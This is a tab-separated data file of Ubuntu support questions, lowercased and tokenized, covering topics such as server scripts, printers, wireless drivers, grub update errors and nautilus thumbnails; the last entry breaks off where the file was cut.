157675	multiple users sending input to the same server running on my ubuntu server	i 've just recently started hosting a java based server on my ubuntu server . i 've been learning how to setup everything and i 've been feeling pretty good about it 's setup . i currently start the server with the following sh script : # ! /bin/bash clear echo `` loading minecraft server ... '' java -d64 -xincgc -xmx1024m -jar craftbukkit.jar nogui while setting it up , i thought it would also be pretty cool to let some other people help manage the server . as of currently i 've been ssh'ing into my server using putty . i cd to the directory and then run my sh script using ./run.sh . this all works great and i can issue commands to the server via my putty client . the server displays ( and has focus ? ) through the putty client only though . i ca n't seem to send commands from the host server to the server . how would i send commands from say the host to the java server that ( has focus ? ) in the putty client ? the next question is , assuming my server had multiple users , how could i allow them to interact with the server as well ( via ssh ) ?
157676	how to record a screencast with audio in gnome shell	i 'm trying to change my configuration so that the default alt + ctrl + shift + r also records audio . i 've used this code : gsettings set org.gnome.shell.recorder pipeline `` queue ! videorate ! vp8enc quality=10 speed=2 ! mux . pulsesrc ! audio/x-raw-int ! queue ! audioconvert ! vorbisenc ! mux . webmmux name=mux '' in my console , and it works ok , it just does n't stop once i hit ctrl + alt + shift + r again . any help would rock !
157684	mysqli for php in package mysql	i am trying to get mysqli set up for php5 but apt tries to substitute php5-mysql for php5-mysqli , which does n't exist . does the mysql package also carry the mysqli extension , or do i need to find the source and compile it somewhere ?
157688	how to keep skype-wrapper in messaging menu after closing it ?	i am trying to integrate skype with ubuntu . i am using skype wrapper ( link to omg ubuntu ) to have it in the messaging menu after turning it on as well as this solution on ask ubuntu to remove the icon from the panel . when i open skype-wrapper , skype sits nicely in the messaging menu only . however , when i completely exit skype , it is n't in the messaging menu . the question is : how can i permanently keep skype-wrapper in the messaging menu ( so that i can turn it on from there ) , like i can with empathy and friends ?
157690	what is the right way for reporting bugs ?	i want to report a bug in the unity launcher ( as soon as you drop an application -namely evolution- there , it reserves the space but does n't show the icon until you log out and log back in ) . following the advice in ubuntu 's web page , i tried running `` ubuntu-bug unity '' but it displays a message saying the development ended and so on ... it says i can continue if i was referred by technical support . i think reporting bugs should be extremely easy for users that want to collaborate , but it seems the other way around . finally , my question : what is the `` proper '' way for reporting bugs ? thanks !
157696	camera problems after upgrade	after today 's upgrade of 12.04 to the latest linux kernel and chrome to version 20 my camera ( creative live ! cam sicialize hd ) behaves weirdly when i 'm on gmail page in chrome : it blinks and the browser itself hangs from time to time for a few seconds . i do n't know which affects which ( i.e . linux update troubles chrome or vise versa ) and so far could't find a solution . it 's obvious though that the above behavior is caused by chrome 's talk plugin - when i close the gmail tab the browser returns back to normal . any ideas what it is and how to fix this issue ?
157703	how to uninstall ubuntu 12.04 installed from inside windows 7	i installed ubuntu running windows 7 . now i want to remove it , want to know if i just need to uninstall it from control panel , or is there any other way thanks
157717	can i provision a maas node with an arbitrary install image ?	i 'd like to provision machines using arbitrary install images ( i.e . ubuntu +1 daily isos . ) i know this is possible in cobbler , and i 'm wondering if it can be done using the maas api or if i should just use cobbler directly .
157722	setting xdg_data_dirs and xdg_data_home	i made some mistake by setting environment variabel now i can not launch any application from the console and recieve this error : glib-gio-error ** : no gsettings schemas are installed on the system i have reinstall gsettings-desktop-schemas but of course that helps not all . i made setting of variable because i wanted to make view3dscene launchable from the dash : xdg_data_home=/usr/local/share/ export xdg_data_home and xdg_data_dirs=/usr/local/share/ export xdg_data_dirs i had a console warning during the installation of view3dscene as follow : note that '/home/xxx/.local/share ' is not in the search path set by the xdg_data_home and xdg_data_dirs environment variables , so applications may not be able to find it until you set them . the directories currently searched are : - /root/.local/share - /usr/local/share/ - /usr/share/ how can i make this in the right way and repair those wrong settings ? now i do n't want to reboot system because somehow i have feeling that i do n't get in anymore with those wrong settings..right ? regards
157723	can not rdp to windows 7 with remmina on 12.04	since i upgraded to 12.04 , i am unable to rdp to a windows 7 server . all i can see is a pop-up that says `` uable to connect to rdp server `` . i am able to rdp using vinagre , so that rules out any issues with my router or the windows server . as far as i can tell , there are no logs from remmina and the debug window shows a blank . any one got any ideas ? thanks .
157724	is it possible to install ubuntu from an ubuntu host machine onto a partition without needing to boot to install media ?	i.e . can you run the install program from an already running linux machine to install ubuntu on a separate disk/partition ? i suppose it would effectively be a wubi for linux . my use case is building a disk image from scratch . i could do it via virtual machine i think , but would be much easier if there was another option .
157725	wired resolves dns but wireless dont	my wireless wo n't resolve dns but my wired connection does . i 've tried : $ sudo /etc/init.d/networking restart and : $ sudo dhclient -r $ sudo dhclient as i saw at that question . but it did n't solved . any thoughts on what might been happening or which logs i got ta see to know why is it not solving dns ? sorry about the question like this , but i 'm really newbie at ubuntu . when i try to sudo nmap -sp 192.168.1.1-254 i can see my wired connection and the modem itself but i ca n't see my wireless connection . $ sudo nmap -sp 192.168.1.1-254 starting nmap 5.21 ( http : //nmap.org ) at 2012-06-29 16:21 brt nmap scan report for 192.168.1.1 < -- modem host is up ( 0.0027s latency ) . mac address : 7c:4f : b5:88 : c3 : de ( unknown ) nmap scan report for 192.168.1.135 < -- wired connection host is up . nmap done : 254 ip addresses ( 2 hosts up ) scanned in 4.55 seconds
157726	how to start ccsm in 12.04 ... can not import name conffile	( i have n't used compiz in a while , and thought i 'd like to try it again , hopefully in kde ) when i try to start ccsm i get this message : traceback ( most recent call last ) : file `` /usr/bin/ccsm '' , line 96 , in < module > from ccm.constants import version , conffile importerror : can not import name conffile ( note : this ccsm is from the ubuntu repositories ) what can i do to get ccsm , ( , etc ... ? ) working again ? p.s . i also tried some older ccsm i compiled a while back ( not 100 % sure if they where working before ) : /opt/compiz++/bin/ccsm traceback ( most recent call last ) : file `` /opt/compiz++/bin/ccsm '' , line 30 , in < module > import pygtk importerror : no module named pygtk /opt/compiz++/bin/ccsm++ traceback ( most recent call last ) : file `` /opt/compiz++/bin/ccsm '' , line 30 , in < module > import pygtk importerror : no module named pygtk /opt/compiz++0.9.4/bin/ccsm traceback ( most recent call last ) : file `` ./ccsm '' , line 118 , in < module > context = compizconfig.context ( ccm.getdefaultscreen ( ) ) attributeerror : 'module ' object has no attribute 'getdefaultscreen' /opt/compiz++0.9.4/bin/ccsm++ traceback ( most recent call last ) : file `` /opt/compiz++0.9.4/bin/ccsm '' , line 92 , in < module > import compizconfig importerror : libprotobuf.so.6 : can not open shared object file : no such file or directory p.s . # 2 quote : oops ! your question could n't be submitted because : users with less than 300 reputation ca n't create new tags . the tag 'conffile ' is new . try using an existing tag instead . somebody want to add 'conffile ' and 'ccsm ' as tags for me ? or tell me why it should n't be added ? ( and maybe , only if it 's appropriate add 'ccsm++ ' , 'libprotobuf ' , and/or 'pygtk ' , ... ? )
157727	users and groups no save button	i am trying to add user privileges ; use modems & connect to wireless & ethernet networks to my current & only user profile . it 'll ask for my password & i am admin , but the save/cancel buttons are completely missing from opened window . i am running a fresh install of xubuntu 12.04 .
157728	canon printer mp220 driver problem	i have a problem with my canon mp 220 printer . the driver works well only if the page is full written . but if it 's ... let'say 4 or 5 rows written , it prints the 4 or 5 rows and after that it says the printing it 's finished but the paper it 's inside of the printer , and the printer it 's blocked . what 's goining on ? is it a driver problem ?
157730	making more space on ubuntu 12.04	i been running ubuntu 12.04 with a lot of problems blured status texts , no sound , and now running out of space on my 80g hard drive . i think i gave ubuntu too much of my hard drive ( 74 % ) . i was wondering if it is possible to make more free space on my hard drive by cutting back on ubuntu 's partition .
157731	how do i get an epson al-c 1700 printer working ?	i have a brand new epson aculaser c1700 and i 'd like to have it working fine on ubuntu 12.04. so i did my homework , kind of , no printer driver comes for this printer in cups ... so i asked epson support who drove me to avasys who no longer handle support since december 2011 . this the question that is still in my mind : as this printer comes with an osx driver which uses cups as printer server , how come no driver can be found for cups ? i tried to get ppd and filters from osx driver and use them to install the printer on ubuntu but no answer from printer and none printed sheet i have ... . i 'm so disappointed i could cry ... i 'd like to work with someone to get this working fine , please help me !
157735	ca n't resume from suspend	i am a newbie to ubuntu environment . i using asus 1225 eee pc netbook , with ubuntu 12.04 version . when i choose suspend , i guess it goes to low power state but when i press any key it does n't resume . so i had to turn off and again start my system . kindly tell me how to resume from suspend ? thank you .
157738	i do n't know what is my audio device and there is no sound on ubuntu 11	i have a little bit strange desktop . it is a hp compaq desktop with all its components enclosed by the factory ( like a laptop ) . i do n't know what the audio and video devices are but on windows i just put the gigabyte definition cd and it does all the work for me . now , how can i do such a thing on ubuntu 11 ? ! the only thing i miss on ubuntu is audio . i ca n't play any music or video ! ! a thing i think it will be useful is that before i install ubuntu and erase windows , the audio device or something like that was `` realtek sound effec manager '' . i copied the name . how can i play audio on my pc ? !
157739	how do i get sleep and hibernate working on an asus k53z ?	help ! new asus k53z laptop that has a fresh ubuntu 12.04 install ... however , sleep does n't work ... tried to follow the manual process in this thread ... http : //ubuntuforums.org/showthread.php ? t=1460790 the dropbox package was a 404 , and my results are working ... closing the lid of the computer shuts the wireless off , and the screen remains lit up . i 'm a relative novice , but have been trying to work in terminal and follow instructions , but with this one i 'm having little success .
157740	updating to linux-image-3.2.0-26-generic occupies all disk space	i just ran a normal update through the update manager that wanted to update me to linux-image-3.2.0-26-generic . the installation paused halfway with a message that the root was full . i checked the disk usage , and noticed that one of the newly installed files : /lib/modules/3.2.0-26-generic/modules.ccwmap took up 63gb ( ! ) . compared to the previous version , /lib/modules/3.2.0-24-generic/modules.ccwmap , that took up only 4kb . it seems like something went awfully wrong ! as mentioned the update was paused when i ran out of disk space . there is no option in the update dialog to cancel or perform rollback on the update . is it asking for trouble to kill the update manager ? any ideas as to what went wrong , and what i can do to remedy it ? it 's only minimal how much space i can free on that partition ( without deleting the above mentioned file ) . if it is any help , the update was paused after this : examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic
157741	problems with intel centrino wirless-n 1000	i have been having problems with setting up my wifi on ubuntu 12.04 . i installed it last week and since then have had the same problem as most in that the connection was never stable and had a pop up asking for password every 20 seconds or so . i have tried adding the options iwlagn 11n_disable=0 to /etc/modprobe.d/iwlagn.conf but never got it working . in the process of going through methods found on this site i appear to have taken the wifi card off . i now have a network that is unclaimed for wlan0 and is not seen in iwconfig . $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation device 124d ( rev a1 ) 03:00.0 network controller : intel corporation centrino wireless-n 1000 04:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 0a:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) $ sudo lshw -c network *-network unclaimed description : network controller product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f3b00000-f3b01fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0a:00.0 logical name : eth0 version : 06 serial : 84:8f:69 : b9:40 : bc size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.1.80 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:50 ioport:2000 ( size=256 ) memory : f3004000-f3004fff memory : f3000000-f3003fff $ iwconfig lo no wireless extensions . eth0 no wireless extensions .
157755	disappearing launcher icons on 12.04	explains the problem . the first missing icon is for 'screenshot ' and the second one is for 'sublime text 2 ' . can someone tell me what 's going on here and how i can fix it ? thanks ! specs : 12.04/x86_64/kernel3.4/core2duo/4500mhd
157762	autostart ubuntuone on headless server	i 've set up ubuntuone on my headless server using this guide https : //wiki.ubuntu.com/ubuntuone/headless however i get disconnected every time i log off and i have to connect it manually each time i log into my server . i want it to autostart and be online all the time even if im not logged into the server . how do i do that ?
157764	set up apt-get remove commands in deb file ( dh_make )	so , i 'm trying to package my python app , virtuam . my question is simple : how can i set the commands which run when i remove the program using apt-get ?
157767	how do i force a redraw using python in gtk3 ?	apparently , in gtk3 the 'expose ' event/signal is replaced with the 'draw ' signal . how do i force a redraw using python in gtk3 ? i was not able to find any window invalidation function .
157770	boot time seems unusually long on msi gx660r ( bootchart included )	after upgrading ( clean install ) to ubuntu 12.04 , the speed issue when running programs has reduced on my msi gx660r laptop . however , the boot time is still much longer ( over a minute , even after bios ) than on the many less powerful laptops i have encountered running the same os , and i was wondering if anyone could help me improve it . i use the fglrx driver , if that makes any difference . i have uploaded a boot chart , it can be found here http : //imageshack.us/photo/my-images/4/bootchartl.png/ as you can see , the boot time is over a minute even after bios . a 'designed for vista ' laptop from ages ago which i installed ubuntu on boots in around thirty seconds , so i think it 's a bit strange . output of dmesg : http : //paste.ubuntu.com/1081359/ output of /var/log/kern.log : http : //paste.ubuntu.com/1081363/ output of /var/log/syslog : http : //paste.ubuntu.com/1081365/
157771	webkit.webview - wrap content	currently , i have my webkit.webview in a scrolledwindow , because otherwise my window would resize to fir the content . in stead , i would like the content to adjust to the container . so text should wrap , in stead of running straight through and resizing the window . a horizontal scroll bar meant to be there , but not a horizontal one .
157772	how do i upgrade to the latest grub 2.00 ?	according to this link , grub 2.00 has just been released . how can one upgrade to this ?
157773	how to tell which of the two ftp server running is serving an ftp request ?	i was asked to reconfigure and make some order in a ftp server which is operating on ubuntu 10.04 . i have root access to the machine . when checking what server is running , i get : # ps -ef | grep ftp root 2287 1 0 mar19 ? 00:00:00 /usr/sbin/vsftpd root 26380 26369 0 jun27 ? 00:00:02 /usr/lib/openssh/sftp-server from the man pages i understand that vsftpd and sftp-server are both ftp server software . how can i tell which server is actually serving an ftp request from a remote machine ?
157774	where do i go to learn about writing device-drivers	i do not know how to write this any simpler . i have several books on linux device-drivers , but i need a little help to get started .
157779	how to determine whether a process is running or not and make use it to make a conditional shell script ?	how can i determine if a process is running or not and then have a bash script execute some stuff based on that condition ... for example : if process 'abc ' is running , do this if it is not running , do this .
157784	how do i make an amd64 version of my application ?	i am here because i am able to successfully upload the i386 build of my program to launchpad , but i have no idea how to create a native 64-bit application . your help would be greatly appreciated .
157785	juju : error unexpected error interacting with provider : 409 conflict	i 'm trying to realize an ubuntu enterprise infrastructure using virtualbox creating all vms . after i followed this tutorials : https : //wiki.ubuntu.com/serverteam/maas https : //wiki.ubuntu.com/serverteam/maas/addnodes without have issues . when use the following guides : https : //wiki.ubuntu.com/serverteam/maas/juju http : //marcoceppi.com/2012/05/juju-maas-virtualbox/ my environments.yaml 's file is : environments : vb-maas : type : maas maas-server : 'http : //192.168.0.10:80/maas' maas-oauth : '***ssh_key***' admin-secret : 'nothing' default-series : 'precise' but when i run sudo juju bootstrap receive this error 2012-06-29 23:55:33,568 info bootstrapping environment 'vb-maas ' ( origin : distro type : maas ) ... unexpected error interacting with provider : 409 conflict 2012-06-29 23:55:34,475 error unexpected error interacting with provider : 409 conflict why ? someone will help me ? thanks a lot
157786	where are the instructions for checking md5 checksums ?	where do i find instructions for making sure the ubuntu iso i download is correct ?
157788	cli looking/acting strange on a beaglebone	i 'm having an issue with the command line interface . i 'm running precise 12.04 armhf on a beaglebone and all the functionality works fine that i need . i have a 'cosmetic problem ' when logged in as the non-default user . the command line is simply a `` $ '' no matter what directory i 'm on . when i 'm logged in as the default user it reads `` user @ hostname/directory '' . also autocomplete ( tab completion ) seems to be disabled when i 'm using the other user . i can use 'su ' and switch to and from the default username and get a different looking prompt ( `` $ '' and `` user @ hostname/directory '' ) . pretty sure it 's an easy fix . help !
157790	is 12.04 compatible with the dell xps 14z laptop ?	thinking of buying above ultrabook and installing ubuntu . anyone done this already ?
157793	why is swap being used even though i have plenty of free ram ?	i thought the whole essence of swap was to act as a temporary storage safety net when ram was full but my swap partition is constantly being used even though i sometimes have as much as 3gb free ram . is this normal ?
157803	why wo n't this bash script to drop caches work ?	i am trying to make a bash script to clear my ram caches . here 's what i have so far : # ! /bin/bash free -m sync sudo -s echo 3 > /proc/sys/vm/drop_caches but it does n't fully work . the first three commands work perfectly , at the fourth command it exits . please explain .
157806	why is helvetica hollow in both chromium and aurora ?	currently trying to teach myself bootstrap , which calls the following fonts : font-family : `` helvetica neue '' , helvetica , arial , sans-serif ; ... and the fonts display fine , but they 're hollow . there 's an outline and no fill . this scales down to all sizes of font , and is occurring across both aurora and chromium . did the update `` break '' the helvetica font somehow ? is there a way to refresh just the helvetica neue font on my system ?
157812	how do i install the latex opensans package ?	i have just upgraded to 12.04 . i have always used latex opensans package ( www.ctan.org/pkg/opensans ) and never had problems with it in ubuntu . now i installed it the same way as i always did but i can not get it to work at all ! i use it with lyx ( www.lyx.org ) . anyone using latex opensans in ubuntu 12.04 ? if so , how did you install it ? thanks in advance .
157820	how do nautilus album art thumbnails work ?	there 's something for which i 've been searching an answer for a while now , but to no avail , and it 's strange to me , as it seems like a thing that people would talk about : one of those nice little nonsense that enhance the computing experience a little bit . anyway . i have a fair music collection . i save all the songs as ogg files . all is fine , and i can listen to the files , but there 's something weird with the files in nautilus : some have icons displaying their album art , while others do n't , and i just ca n't understand why . i read on this site today that it 's a matter of embedding the album art to the file , but that 's not true , as i embedded the album art to the files i wanted several times , to no avail . furthermore , removing an embedded album art from a file did n't have any effect on those that are displaying the icons . so my question is : how does it work ? where does nautilus ( or ubuntu , i do n't know ) get the picture from ? how do i edit it ?
157828	how do i install the full compiz fusion plugin set ?	what is the install command to issue to the terminal to install compizfusion ( the full package set )
157831	how can i install eclipse 4 through ubuntu software center ( desktop 12.04 64bit ) ?	how do i install eclipse 4 through ubuntu software center on my desktop 12.04 64 bit os ? the reason i would like to install through ubuntu software center is because it 's easy to uninstall the software , and i want to manage all my installed programs through the software center . if i have to install through other means , will eclipse show up in ubuntu software center ? thanks for any help . update : clarification i did find eclipse but it was version 3.7 . i 'm looking to install version 4 .
157832	where can i find old versions of acrobat reader ( < 9.4 ) in deb form ?	it turns out that apparently adobe has disabled movie playback in newer versions ( 9.4 and up ) of acrobat reader in linux . where can i find deb packages of older versions ? the idea is to overwrite the currently installed version ( 9.5.1 ) in ubuntu 12.04 . there are some launchpad repositories , with , for example , acroread-9.3.3-1lucid1.deb but the file shows as `` ( deleted ) '' .
157838	why does dpkg give me this parsing error ?	any time i try to install software or updates , i get the following message ( or a slight variation ) : dpkg : error : parsing file '/var/lib/dpkg/available' near line 10650 package 'libreoffige-writev ' : field name `replaces > ' must be followed by colon i have no idea what it means , but it always insists that `replaces > ' be followed by a colon .
157840	why does apt-get fail to resolve the mirror ?	i know this has been covered before , but i ca n't seem to resolve my issue . here is my output . jake @ kubie-server : ~ $ sudo apt-get update err http : //us.archive.ubuntu.com precise inrelease err http : //us.archive.ubuntu.com precise-updates inrelease err http : //us.archive.ubuntu.com precise-backports inrelease err http : //security.ubuntu.com precise-security inrelease err http : //archive.canonical.com precise inrelease err http : //ppa.launchpad.net precise inrelease err http : //archive.canonical.com precise release.gpg temporary failure resolving 'archive.canonical.com' err http : //ppa.launchpad.net precise release.gpg temporary failure resolving 'ppa.launchpad.net' err http : //security.ubuntu.com precise-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //us.archive.ubuntu.com precise release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-updates release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-backports release.gpg temporary failure resolving 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise- updates/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise- backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //ppa.launchpad.net/webupd8team/java/ubuntu/dists/precise/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise- updates/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise- backports/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise- security/release.gpg temporary failure resolving 'security.ubuntu.com' w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'archive.canonical.com' w : failed to fetch http : //ppa.launchpad.net/webupd8team/java/ubuntu/dists/precise/release.gpg temporary failure resolving 'ppa.launchpad.net' w : some index files failed to download . they have been ignored , or old ones used instead . any help is greatly appreciated .
157844	why does dropbox fail with a `` dropboxd not found '' error ?	this is a fresh install of dropbox on a 12.04 server running on a 32bit system . it does not seem to fail the installation , but when i try to run it , i am told it ca n't find the file . following the instructions on the dropbox site , i get the following message : /home/kevin/.dropbox-dist/dropboxd : 10 : exec : /home/kevin/.dropbox-dist/dropbox : not found permissions currently being used : $ ls -l ~/.dropbox-dist/dropboxd -rwxrwxrwx 1 kevin kevin 258 jun 13 20:40 /home/kevin/.dropbox-dist/dropboxd has anyone had this problem and know a work around ? running 12.04 server
157845	what is an elegant way to install non-repository software in 12.04 ?	perhaps i missed something when canonical removed the `` create launcher '' option from the right click menu , because i 've really been missing that little guy . for me , it was the preferred way to install software that comes not in a .deb , but in a tar.gz , for example . ( note : in that tar.gz i have a folder with the compiled files , i 'm not compiling from source ) i just downloaded the new eclipse ide and extracted the tar.gz to my /usr folder . now , i 'd like to add it to my desktop and dash so it can be started easily . intuitively i would right click the desktop and create a launcher . after this i 'd copy the .desktop to /usr/share/applications . however , creating a launcher is not possible . my question : how would you install an already compiled tar.gz that you have downloaded from the internet ? below are a few things i 've seen , but these are all more time-consuming than the right click option . if you have any better ideas , please let me know . thanks ! manual copy & create a .desktop file : manually simply extract the archive to /usr . create a new text file , adding something along the lines of the code block below : [ desktop entry ] version=1.0 type=application terminal=false exec= '' /usr/local/eclipse42/eclipse '' name= '' eclipse 4.2 '' icon=/home/tomas/icons/eclipse.svg rename this file to eclipse42.desktop and make it executable . then copy this to /usr/share/applications . manually copy & create a .desktop file : gui fossfreedom has elaborated on this in how can i create launchers on my desktop ? basically it involves the command : gnome-desktop-item-edit -- create-new ~/desktop after creating the launcher , copy it to /usr/share/applications .
157848	how to resize ( increase ) a root+home cloned partition from a smaller hdd ?	i had a failing hard-drive so i cloned it with dd to larger 500 gb hd . it seemed to have worked well , but i have all this unallocated free space at the end of the disk ( 230 gb ) . i tried to used gparted from a liveusb to allocate all this space to my root + home partitions ( other than that i only have a small extended partition with the swap ) . it wo n't let me do this . i can only create another partition , or allocate the free space to the extended partition . i can however reduce the size of the root + home partition since i was n't using all the space . is there a way to put this free space to my root + home partition after all ? or do i have to go with another partition . if so i 'd like to separate my home from the root , reduce the root partition and create a ext4 logical home partition . what would be the best and safest way to do this ?
157849	is it possible to preview arbitrary formats in nautilus ?	i recently found out that nautilus ( ubuntu 12.04 at least ) can show thumbnails of files of non-image formats , for example ( data grapher ) grace files ( .agr ) shows a small version of the graph contained in its data . obviously , there some library or script that is processing the file , making the image , and allowing nautilus to show a small version of it . this made me think that in principle any file that potentially can be processed into an image can serve as a nautilus thumbnail . for example , a .tex file ( which can be converted to .pdf ) or a gnuplot script can be displayed as a thumbnail when possible . in the case of .tex file , the correspoding .pdf can be created by the command pdflatex file.tex . the question is , how can i tell nautilus to create a thumbnail for an arbitrary format and how do i specify the commands to do so within nautilus ? update 2014 , i still did n't manage to preview anything with the answer posted , i created this script in /usr/bin/tex-thumbnailer : pdflatex $ 1 convert -density 300 $ { 1 % . * } .pdf -resize 25 % $ 2 and a file /usr/share/thumbnailers/tex.thumbnailer : [ thumbnailer entry ] tryexec=tex-thumbnailer exec=tex-thumbnailer % u % o mimetype=text/x-tex ; i ca n't make nautilus to generate/show the preview even for simple tex files . i do n't know what i am doing wrong .
157850	i 'm trying to install postgresql on 12.04 , and it 's just not working	i 've got a new installation and i 'm trying to get postgresql working . the database was installed and i started a restoration from a dump on another machine , but that ran into problems because i had forgotten to install the `` contrib '' package . i used `` pg_dropcluster '' to drop the old cluster so i could start from scratch , and that 's when things went weird . the first manifestation of this was that /etc/postgresql was just empty . i uninstalled the postgresql package and reinstalled , several times , to no avail . is there something i can do to figure out why apt is confused here ? i 've done this many times on many systems and never seen anything like this happen .
157852	dual boot ubuntu/window7	i have ubuntu installed on one hard drive and windows 7 installed on a second hard drive . when booting into ubuntu , the operating system sees the windows 7 hard drive . how do i disable or unmount this hard drive so that ubuntu ignores my windows 7 hard drive completely everytime i boot into ubuntu ? ?
157856	how do i launch the app from within `quickly test` for gui testing ?	i 'm trying to use ldtp to test my quickly app . ldtp.launchapp ( 'bin/myapp ' ) does n't work because myapp requires whatever voodoo quickly sets up in order to actually launch the app . how can i get ldtp.launchapp to work properly ? ( maybe the right question is : what is the voodoo that quickly sets up in order to run the app ? does quickly expose this api so that i can call it from my test ? )
157859	how do i get rid of the drive mount confirmation question for sshfs on boot ?	with help from this site , i was able to set up an sshfs connection between two computers on my lan so that one auto mounts on the other at boot time . everything works , but there is this annoying confirmation that comes up whenever i boot : an error occurred while mounting /home/dave/mythbuntu . press s to skip mounting or m or manual recovery if i press s , then booting continues , and my drive is mounted as hoped , so it seems like even though i `` skipped '' it , maybe it tried again and succeeded later in the boot process . i followed the instructions here to set up `` if up / if down '' scripts , and here is my current /etc/fstab : sshfs # mythbuntu @ 192.168.0.4 : /home/mythbuntu /home/dave/mythbuntu fuse auto , users , exec , uid=1000 , gid=1000 , allow_other , reconnect , transform_symlinks , batchmode=yes 0 0 although the mounting is working , this step of having to press s every time i boot is obviously kind of a hassle . how do i configure my computer so i do n't have to do that , and so that my other computer will still automount ?
157860	how do i write unicode charcaters in console mode ?	i know that i 'm available to write unicode characters in a terminal application by pressing ctrl+shift+u + unicode hex value , but i do n't know how to input ` ( the grave accent for example ) , or any other unicode character when i switch to console mode by pressing ctrl+alt+f1 .
157865	`` error executing bcdedit.exe command '' when trying to install via wubi	an error occurred : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 63bc2fe2-24a2-11e1-a588-b3529b3c61fc } device partition=l : retval=1 stderr=an error has occurred setting the element data . the request is not supported . stdout= for more information , please see the log file : c : \users\account\appdata\local\temp\wubi-12.04-rev266.log any idea how to work-around this error ? it appears with 0s left on installation time . thanks in advance .
157868	what do the 68 group symbols in keepassx stand for in detail ?	keepassx 0.4.3 > menu > groups > add new group > ( group preferences ) > ' > ' lists 68 group symbols . what do these 68 group symbols stand for in detail ? the keepassx handbook does not explain that . i could not find the answer in the documentation of the keepassx project either .
157869	updates fail due to `` /etc/default/grub : splashâ : not found '' error	i upgraded ubuntu 11.10 to 12.04 lts immediately after its release ( april 2012 ) . since then updates ( new kernels and others ) succeeded regularly , but recently , suddenly , updates fail consistently . what causes the problem and how can it be solved ? terminal information after the last update attempt : ariel @ ariel-ms-7592 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-3.2.0-26-generic ( 3.2.0-26.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic update-initramfs : generating /boot/initrd.img-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : splashâ : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 127 failed to 